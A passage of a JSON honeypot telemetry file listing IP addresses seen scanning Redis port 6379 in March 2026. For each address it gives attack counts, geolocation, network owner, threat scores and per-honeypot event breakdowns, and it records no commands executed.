        "spread": 10,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 21,
        "days_active_30d": 29,
        "ports_targeted_30d": 16,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-03T01:16:33.114000+00:00",
        "last_seen_30d": "2026-03-31T06:29:22.224000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 16,
        "Honeytrap": 5
      }
    },
    "74.82.47.34": {
      "attack_count": 4,
      "first_seen": "2026-03-21T14:19:30.000Z",
      "last_seen": "2026-03-21T14:20:33.552Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Gunnison",
      "asn": 6939,
      "as_org": "Hurricane Electric LLC",
      "threat_score": 31.6,
      "threat_level": "low",
      "score_components": {
        "frequency": 12.6,
        "persistence": 15.8,
        "diversity": 14,
        "spread": 5,
        "recency_factor": 0.67
      },
      "reputation_metrics": {
        "total_events_30d": 18,
        "days_active_30d": 19,
        "ports_targeted_30d": 7,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-03T10:59:38.806000+00:00",
        "last_seen_30d": "2026-03-21T14:20:33.552000+00:00",
        "days_since_last_seen": 10
      },
      "honeypot_breakdown_30d": {
        "Suricata": 18
      }
    },
    "176.65.132.181": {
      "attack_count": 1080,
      "first_seen": "2026-03-21T05:52:17.000Z",
      "last_seen": "2026-03-21T16:20:23.162Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Germany",
      "country_code": "DE",
      "city": null,
      "asn": 51396,
      "as_org": "Pfcloud UG (haftungsbeschrankt)",
      "threat_score": 39.8,
      "threat_level": "low",
      "score_components": {
        "frequency": 30,
        "persistence": 1.7,
        "diversity": 8,
        "spread": 20,
        "recency_factor": 0.67
      },
      "reputation_metrics": {
        "total_events_30d": 1570,
        "days_active_30d": 2,
        "ports_targeted_30d": 4,
        "honeypots_triggered_30d": 4,
        "first_seen_30d": "2026-03-20T00:45:40+00:00",
        "last_seen_30d": "2026-03-21T18:18:16.190000+00:00",
        "days_since_last_seen": 10
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1165,
        "Redishoneypot": 250,
        "Honeytrap": 84,
        "Dionaea": 71
      }
    },
    "8.137.156.127": {
      "attack_count": 767,
      "first_seen": "2026-03-14T19:50:33.000Z",
      "last_seen": "2026-03-14T20:41:19.903Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": "Chengdu",
      "asn": 37963,
      "as_org": "Hangzhou Alibaba Advertising Co.,Ltd.",
      "threat_score": 18.8,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 23.6,
        "persistence": 0.8,
        "diversity": 4,
        "spread": 15,
        "recency_factor": 0.43
      },
      "reputation_metrics": {
        "total_events_30d": 230,
        "days_active_30d": 1,
        "ports_targeted_30d": 2,
        "honeypots_triggered_30d": 3,
        "first_seen_30d": "2026-03-14T19:51:41.810000+00:00",
        "last_seen_30d": "2026-03-14T20:41:19.903000+00:00",
        "days_since_last_seen": 17
      },
      "honeypot_breakdown_30d": {
        "Suricata": 119,
        "Redishoneypot": 90,
        "Cowrie": 21
      }
    },
    "160.119.76.43": {
      "attack_count": 185,
      "first_seen": "2026-03-13T12:04:10.000Z",
      "last_seen": "2026-03-27T08:07:52.578Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Seychelles",
      "country_code": "SC",
      "city": null,
      "asn": 49870,
      "as_org": "Alsycon B.V.",
      "threat_score": 75.8,
      "threat_level": "high",
      "score_components": {
        "frequency": 30,
        "persistence": 12.5,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.87
      },
      "reputation_metrics": {
        "total_events_30d": 1845,
        "days_active_30d": 15,
        "ports_targeted_30d": 75,
        "honeypots_triggered_30d": 10,
        "first_seen_30d": "2026-03-13T11:45:02+00:00",
        "last_seen_30d": "2026-03-27T09:44:10.810000+00:00",
        "days_since_last_seen": 4
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1248,
        "Honeytrap": 364,
        "Cowrie": 72,
        "Dionaea": 70,
        "Redishoneypot": 40,
        "Mailoney": 27,
        "ConPot": 14,
        "H0neytr4p": 5,
        "Miniprint": 3,
        "ElasticPot": 2
      }
    },
    "3.134.216.108": {
      "attack_count": 177,
      "first_seen": "2026-03-27T04:49:48.000Z",
      "last_seen": "2026-03-27T05:40:25.436Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Columbus",
      "asn": 16509,
      "as_org": "Amazon.com, Inc.",
      "threat_score": 99.2,
      "threat_level": "critical",
      "score_components": {
        "frequency": 30,
        "persistence": 24.2,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 4605,
        "days_active_30d": 29,
        "ports_targeted_30d": 146,
        "honeypots_triggered_30d": 13,
        "first_seen_30d": "2026-03-03T15:08:00+00:00",
        "last_seen_30d": "2026-03-31T21:20:54.737000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 2958,
        "Honeytrap": 1292,
        "Cowrie": 155,
        "Dionaea": 79,
        "Redishoneypot": 45,
        "ConPot": 26,
        "Mailoney": 17,
        "Ipphoney": 9,
        "Ciscoasa": 8,
        "Tanner": 6,
        "ElasticPot": 5,
        "H0neytr4p": 3,
        "CitrixHoneypot": 2
      }
    },
    "80.94.95.221": {
      "attack_count": 80,
      "first_seen": "2026-03-06T10:55:04.000Z",
      "last_seen": "2026-03-25T09:24:33.556Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Romania",
      "country_code": "RO",
      "city": null,
      "asn": 204428,
      "as_org": "SS-Net",
      "threat_score": 95.2,
      "threat_level": "critical",
      "score_components": {
        "frequency": 29.3,
        "persistence": 24.2,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.97
      },
      "reputation_metrics": {
        "total_events_30d": 858,
        "days_active_30d": 29,
        "ports_targeted_30d": 118,
        "honeypots_triggered_30d": 6,
        "first_seen_30d": "2026-03-02T21:21:18.733000+00:00",
        "last_seen_30d": "2026-03-30T19:36:15.547000+00:00",
        "days_since_last_seen": 1
      },
      "honeypot_breakdown_30d": {
        "Suricata": 508,
        "Honeytrap": 266,
        "Adbhoney": 28,
        "Redishoneypot": 27,
        "Cowrie": 23,
        "Dionaea": 6
      }
    },
    "71.6.199.65": {
      "attack_count": 76,
      "first_seen": "2026-03-04T19:58:49.000Z",
      "last_seen": "2026-03-18T06:03:29.775Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 10439,
      "as_org": "CariNet, Inc.",
      "threat_score": 73.1,
      "threat_level": "high",
      "score_components": {
        "frequency": 21.8,
        "persistence": 20.8,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.83
      },
      "reputation_metrics": {
        "total_events_30d": 153,
        "days_active_30d": 25,
        "ports_targeted_30d": 19,
        "honeypots_triggered_30d": 7,
        "first_seen_30d": "2026-03-02T06:24:28.838000+00:00",
        "last_seen_30d": "2026-03-26T09:54:39.116000+00:00",
        "days_since_last_seen": 5
      },
      "honeypot_breakdown_30d": {
        "Suricata": 106,
        "Redishoneypot": 24,
        "Honeytrap": 10,
        "Dionaea": 6,
        "Cowrie": 4,
        "ElasticPot": 2,
        "Tanner": 1
      }
    },
    "50.232.194.55": {
      "attack_count": 55,
      "first_seen": "2026-03-04T11:58:48.000Z",
      "last_seen": "2026-03-31T01:41:03.847Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Saint Paul",
      "asn": 7922,
      "as_org": "Comcast Cable Communications, LLC",
      "threat_score": 49.1,
      "threat_level": "medium",
      "score_components": {
        "frequency": 13.8,
        "persistence": 23.3,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 24,
        "days_active_30d": 28,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-04T11:58:49+00:00",
        "last_seen_30d": "2026-03-31T01:41:03.847000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 18,
        "Suricata": 6
      }
    },
    "137.184.197.230": {
      "attack_count": 41,
      "first_seen": "2026-03-11T17:55:40.000Z",
      "last_seen": "2026-03-11T18:50:51.085Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "North Bergen",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 20.9,
      "threat_level": "low",
      "score_components": {
        "frequency": 21.5,
        "persistence": 2.5,
        "diversity": 18,
        "spread": 15,
        "recency_factor": 0.37
      },
      "reputation_metrics": {
        "total_events_30d": 140,
        "days_active_30d": 3,
        "ports_targeted_30d": 9,
        "honeypots_triggered_30d": 3,
        "first_seen_30d": "2026-03-10T15:49:14+00:00",
        "last_seen_30d": "2026-03-12T00:25:40.205000+00:00",
        "days_since_last_seen": 19
      },
      "honeypot_breakdown_30d": {
        "Suricata": 80,
        "Honeytrap": 44,
        "Redishoneypot": 16
      }
    },
    "46.101.146.208": {
      "attack_count": 36,
      "first_seen": "2026-03-02T19:28:15.000Z",
      "last_seen": "2026-03-29T08:58:11.032Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Germany",
      "country_code": "DE",
      "city": "Frankfurt am Main",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 36.2,
      "threat_level": "low",
      "score_components": {
        "frequency": 8.5,
        "persistence": 23.3,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.93
      },
      "reputation_metrics": {
        "total_events_30d": 7,
        "days_active_30d": 28,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-02T19:29:18.362000+00:00",
        "last_seen_30d": "2026-03-29T08:58:11.032000+00:00",
        "days_since_last_seen": 2
      },
      "honeypot_breakdown_30d": {
        "Suricata": 7
      }
    },
    "39.107.95.100": {
      "attack_count": 33,
      "first_seen": "2026-03-06T12:52:28.000Z",
      "last_seen": "2026-03-29T08:41:56.579Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": "Beijing",
      "asn": 37963,
      "as_org": "Hangzhou Alibaba Advertising Co.,Ltd.",
      "threat_score": 39.6,
      "threat_level": "low",
      "score_components": {
        "frequency": 10.4,
        "persistence": 20.0,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.93
      },
      "reputation_metrics": {
        "total_events_30d": 11,
        "days_active_30d": 24,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-06T12:53:38.007000+00:00",
        "last_seen_30d": "2026-03-29T08:41:56.579000+00:00",
        "days_since_last_seen": 2
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 6,
        "Suricata": 5
      }
    },
    "143.110.246.150": {
      "attack_count": 30,
      "first_seen": "2026-03-21T17:23:47.000Z",
      "last_seen": "2026-03-29T21:33:16.423Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "India",
      "country_code": "IN",
      "city": "Bengaluru",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 28.3,
      "threat_level": "low",
      "score_components": {
        "frequency": 10.8,
        "persistence": 7.5,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.93
      },
      "reputation_metrics": {
        "total_events_30d": 12,
        "days_active_30d": 9,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-21T17:23:47+00:00",
        "last_seen_30d": "2026-03-29T21:33:16.423000+00:00",
        "days_since_last_seen": 2
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 9,
        "Suricata": 3
      }
    },
    "183.6.4.31": {
      "attack_count": 30,
      "first_seen": "2026-03-03T20:44:54.000Z",
      "last_seen": "2026-03-26T11:41:11.424Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": "Guangzhou",
      "asn": 4134,
      "as_org": "Chinanet",
      "threat_score": 29.0,
      "threat_level": "low",
      "score_components": {
        "frequency": 7.8,
        "persistence": 20.0,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.83
      },
      "reputation_metrics": {
        "total_events_30d": 6,
        "days_active_30d": 24,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-03T20:46:00.419000+00:00",
        "last_seen_30d": "2026-03-26T11:41:11.424000+00:00",
        "days_since_last_seen": 5
      },
      "honeypot_breakdown_30d": {
        "Suricata": 6
      }
    },
    "81.29.142.50": {
      "attack_count": 30,
      "first_seen": "2026-03-03T09:20:19.000Z",
      "last_seen": "2026-03-24T06:10:00.158Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Russia",
      "country_code": "RU",
      "city": null,
      "asn": 210259,
      "as_org": "LLC Applied Computational Technologies",
      "threat_score": 69.5,
      "threat_level": "high",
      "score_components": {
        "frequency": 28.5,
        "persistence": 21.7,
        "diversity": 20,
        "spread": 10,
        "recency_factor": 0.87
      },
      "reputation_metrics": {
        "total_events_30d": 704,
        "days_active_30d": 26,
        "ports_targeted_30d": 83,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-02T00:28:10.107000+00:00",
        "last_seen_30d": "2026-03-27T12:36:56.911000+00:00",
        "days_since_last_seen": 4
      },
      "honeypot_breakdown_30d": {
        "Suricata": 703,
        "ConPot": 1
      }
    },
    "64.62.156.66": {
      "attack_count": 28,
      "first_seen": "2026-03-18T13:33:35.000Z",
      "last_seen": "2026-03-18T13:35:18.651Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Minneapolis",
      "asn": 6939,
      "as_org": "Hurricane Electric LLC",
      "threat_score": 95.2,
      "threat_level": "critical",
      "score_components": {
        "frequency": 26.0,
        "persistence": 24.2,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 398,
        "days_active_30d": 29,
        "ports_targeted_30d": 95,
        "honeypots_triggered_30d": 10,
        "first_seen_30d": "2026-03-03T05:11:21.971000+00:00",
        "last_seen_30d": "2026-03-31T05:28:48.049000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 247,
        "Honeytrap": 108,
        "Ciscoasa": 12,
        "Redishoneypot": 11,
        "Miniprint": 8,
        "Cowrie": 5,
        "Adbhoney": 2,
        "ConPot": 2,
        "Dionaea": 2,
        "ElasticPot": 1
      }
    },
    "65.49.1.162": {
      "attack_count": 28,
      "first_seen": "2026-03-07T14:42:52.000Z",
      "last_seen": "2026-03-07T14:44:45.099Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 6939,
      "as_org": "Hurricane Electric LLC",
      "threat_score": 94.7,
      "threat_level": "critical",
      "score_components": {
        "frequency": 24.7,
        "persistence": 25,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 294,
        "days_active_30d": 30,
        "ports_targeted_30d": 79,
        "honeypots_triggered_30d": 7,
        "first_seen_30d": "2026-03-02T01:50:08+00:00",
        "last_seen_30d": "2026-03-31T13:59:55.624000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 179,
        "Honeytrap": 92,
        "Redishoneypot": 11,
        "Cowrie": 8,
        "ConPot": 2,
        "Dionaea": 1,
        "ElasticPot": 1
      }
    },
    "216.218.206.66": {
      "attack_count": 26,
      "first_seen": "2026-03-29T09:54:58.000Z",
      "last_seen": "2026-03-29T09:56:43.033Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Cazadero",
      "asn": 6939,
      "as_org": "Hurricane Electric LLC",
      "threat_score": 94.8,
      "threat_level": "critical",
      "score_components": {
        "frequency": 24.8,
        "persistence": 25,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 303,
        "days_active_30d": 30,
        "ports_targeted_30d": 56,
        "honeypots_triggered_30d": 10,
        "first_seen_30d": "2026-03-02T04:25:13+00:00",
        "last_seen_30d": "2026-03-31T07:50:29.201000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 181,
        "Honeytrap": 80,
        "Redishoneypot": 11,
        "Ciscoasa": 10,
        "Cowrie": 10,
        "CitrixHoneypot": 3,
        "Tanner": 3,
        "ConPot": 2,
        "Dionaea": 2,
        "Ipphoney": 1
      }
    },
    "5.101.64.6": {
      "attack_count": 26,
      "first_seen": "2026-03-18T22:07:19.000Z",
      "last_seen": "2026-03-18T22:11:00.998Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Russia",
      "country_code": "RU",
      "city": null,
      "asn": 34665,
      "as_org": "Petersburg Internet Network ltd.",
      "threat_score": 98.6,
      "threat_level": "critical",
      "score_components": {
        "frequency": 28.6,
        "persistence": 25,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 718,
        "days_active_30d": 30,
        "ports_targeted_30d": 86,
        "honeypots_triggered_30d": 12,
        "first_seen_30d": "2026-03-02T19:00:10.460000+00:00",
        "last_seen_30d": "2026-03-31T16:34:57.110000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 515,
        "Honeytrap": 118,
        "Cowrie": 36,
        "Tanner": 13,
        "ElasticPot": 7,
        "Dionaea": 6,
        "H0neytr4p": 6,
        "Redishoneypot": 6,
        "CitrixHoneypot": 4,
        "ConPot": 4,
        "Ciscoasa": 2,
        "Honeyaml": 1
      }
    },
    "64.62.156.80": {
      "attack_count": 26,
      "first_seen": "2026-03-30T13:28:33.000Z",
      "last_seen": "2026-03-30T13:30:25.520Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Minneapolis",
      "asn": 6939,
      "as_org": "Hurricane Electric LLC",
      "threat_score": 95.4,
      "threat_level": "critical",
      "score_components": {
        "frequency": 25.4,
        "persistence": 25,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 348,
        "days_active_30d": 30,
        "ports_targeted_30d": 97,
        "honeypots_triggered_30d": 10,
        "first_seen_30d": "2026-03-02T13:10:38+00:00",
        "last_seen_30d": "2026-03-31T14:28:02.998000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 199,
        "Honeytrap": 101,
        "Miniprint": 18,
        "Redishoneypot": 11,
        "Mailoney": 6,
        "Dionaea": 5,
        "Cowrie": 4,
        "Adbhoney": 2,
        "CitrixHoneypot": 1,
        "ElasticPot": 1
      }
    },
    "47.103.157.194": {
      "attack_count": 25,
      "first_seen": "2026-03-05T17:27:58.000Z",
      "last_seen": "2026-03-05T17:29:10.550Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": "Shanghai",
      "asn": 37963,
      "as_org": "Hangzhou Alibaba Advertising Co.,Ltd.",
      "threat_score": 3.0,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 9.5,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.13
      },
      "reputation_metrics": {
        "total_events_30d": 9,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-05T17:27:58+00:00",
        "last_seen_30d": "2026-03-05T17:29:10.550000+00:00",
        "days_since_last_seen": 26
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 6,
        "Suricata": 3
      }
    },
    "147.182.178.32": {
      "attack_count": 21,
      "first_seen": "2026-03-24T12:41:07.000Z",
      "last_seen": "2026-03-24T12:42:17.508Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "North Bergen",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 54.4,
      "threat_level": "medium",
      "score_components": {
        "frequency": 24.3,
        "persistence": 1.7,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.77
      },
      "reputation_metrics": {
        "total_events_30d": 272,
        "days_active_30d": 2,
        "ports_targeted_30d": 10,
        "honeypots_triggered_30d": 5,
        "first_seen_30d": "2026-03-23T20:04:32+00:00",
        "last_seen_30d": "2026-03-24T15:13:22.462000+00:00",
        "days_since_last_seen": 7
      },
      "honeypot_breakdown_30d": {
        "Suricata": 190,
        "Honeytrap": 66,
        "Redishoneypot": 8,
        "ElasticPot": 7,
        "Dionaea": 1
      }
    },
    "157.230.224.183": {
      "attack_count": 21,
      "first_seen": "2026-03-20T02:26:24.000Z",
      "last_seen": "2026-03-20T02:36:36.503Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "North Bergen",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 47.1,
      "threat_level": "medium",
      "score_components": {
        "frequency": 24.0,
        "persistence": 1.7,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.67
      },
      "reputation_metrics": {
        "total_events_30d": 253,
        "days_active_30d": 2,
        "ports_targeted_30d": 16,
        "honeypots_triggered_30d": 5,
        "first_seen_30d": "2026-03-20T02:26:25+00:00",
        "last_seen_30d": "2026-03-21T15:00:47.309000+00:00",
        "days_since_last_seen": 10
      },
      "honeypot_breakdown_30d": {
        "Suricata": 169,
        "Honeytrap": 73,
        "Redishoneypot": 8,
        "Dionaea": 2,
        "ElasticPot": 1
      }
    },
    "106.75.241.127": {
      "attack_count": 20,
      "first_seen": "2026-03-02T19:52:59.000Z",
      "last_seen": "2026-03-20T17:00:37.443Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": null,
      "asn": 17621,
      "as_org": "China Unicom Shanghai network",
      "threat_score": 22.6,
      "threat_level": "low",
      "score_components": {
        "frequency": 7.8,
        "persistence": 15.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.63
      },
      "reputation_metrics": {
        "total_events_30d": 6,
        "days_active_30d": 19,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-02T19:53:00+00:00",
        "last_seen_30d": "2026-03-20T17:00:37.443000+00:00",
        "days_since_last_seen": 11
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 3,
        "Suricata": 3
      }
    },
    "157.245.116.189": {
      "attack_count": 20,
      "first_seen": "2026-03-07T06:23:39.000Z",
      "last_seen": "2026-03-07T06:24:45.594Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Clifton",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 20.9,
      "threat_level": "low",
      "score_components": {
        "frequency": 30,
        "persistence": 3.3,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.27
      },
      "reputation_metrics": {
        "total_events_30d": 113157,
        "days_active_30d": 4,
        "ports_targeted_30d": 64649,
        "honeypots_triggered_30d": 17,
        "first_seen_30d": "2026-03-06T12:52:55.850000+00:00",
        "last_seen_30d": "2026-03-09T19:47:29.042000+00:00",
        "days_since_last_seen": 22
      },
      "honeypot_breakdown_30d": {
        "Suricata": 101135,
        "Honeytrap": 11956,
        "Mailoney": 12,
        "Cowrie": 11,
        "Dionaea": 10,
        "ConPot": 9,
        "Miniprint": 8,
        "Redishoneypot": 3,
        "Adbhoney": 2,
        "Ciscoasa": 2,
        "Dicompot": 2,
        "ElasticPot": 1,
        "H0neytr4p": 1,
        "Ipphoney": 1,
        "Medpot": 1,
        "Tanner": 1
      }
    },
    "159.89.231.117": {
      "attack_count": 20,
      "first_seen": "2026-03-29T07:46:39.000Z",
      "last_seen": "2026-03-29T07:47:52.382Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "North Bergen",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 68.7,
      "threat_level": "high",
      "score_components": {
        "frequency": 23.6,
        "persistence": 2.5,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.97
      },
      "reputation_metrics": {
        "total_events_30d": 229,
        "days_active_30d": 3,
        "ports_targeted_30d": 14,
        "honeypots_triggered_30d": 5,
        "first_seen_30d": "2026-03-28T20:23:52.317000+00:00",
        "last_seen_30d": "2026-03-30T09:22:27.703000+00:00",
        "days_since_last_seen": 1
      },
      "honeypot_breakdown_30d": {
        "Suricata": 142,
        "Honeytrap": 72,
        "Redishoneypot": 8,
        "ElasticPot": 4,
        "Dionaea": 3
      }
    },
    "104.37.191.21": {
      "attack_count": 19,
      "first_seen": "2026-03-11T05:38:03.000Z",
      "last_seen": "2026-03-14T03:40:59.010Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 19318,
      "as_org": "Interserver, Inc",
      "threat_score": 10.6,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 9.0,
        "persistence": 3.3,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.43
      },
      "reputation_metrics": {
        "total_events_30d": 8,
        "days_active_30d": 4,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-11T05:38:04+00:00",
        "last_seen_30d": "2026-03-14T03:40:59.010000+00:00",
        "days_since_last_seen": 17
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 6,
        "Suricata": 2
      }
    },
    "157.245.118.24": {
      "attack_count": 19,
      "first_seen": "2026-03-24T04:17:53.000Z",
      "last_seen": "2026-03-24T04:19:03.015Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Clifton",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 69.6,
      "threat_level": "high",
      "score_components": {
        "frequency": 30,
        "persistence": 15.8,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.77
      },
      "reputation_metrics": {
        "total_events_30d": 108205,
        "days_active_30d": 19,
        "ports_targeted_30d": 65655,
        "honeypots_triggered_30d": 15,
        "first_seen_30d": "2026-03-06T12:46:54.151000+00:00",
        "last_seen_30d": "2026-03-24T04:28:31.425000+00:00",
        "days_since_last_seen": 7
      },
      "honeypot_breakdown_30d": {
        "Suricata": 97386,
        "Honeytrap": 10771,
        "Cowrie": 12,
        "Dionaea": 9,
        "ConPot": 7,
        "Mailoney": 6,
        "Redishoneypot": 3,
        "Adbhoney": 2,
        "Dicompot": 2,
        "ElasticPot": 1,
        "Honeyaml": 1,
        "Ipphoney": 1,
        "Medpot": 1,
        "Tanner": 1
      }
    },
    "20.75.44.66": {
      "attack_count": 19,
      "first_seen": "2026-03-13T09:22:35.000Z",
      "last_seen": "2026-03-21T20:50:59.553Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Boydton",
      "asn": 8075,
      "as_org": "Microsoft Corporation",
      "threat_score": 19.0,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 9.0,
        "persistence": 7.5,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.67
      },
      "reputation_metrics": {
        "total_events_30d": 8,
        "days_active_30d": 9,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-13T09:22:35+00:00",
        "last_seen_30d": "2026-03-21T20:50:59.553000+00:00",
        "days_since_last_seen": 10
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 6,
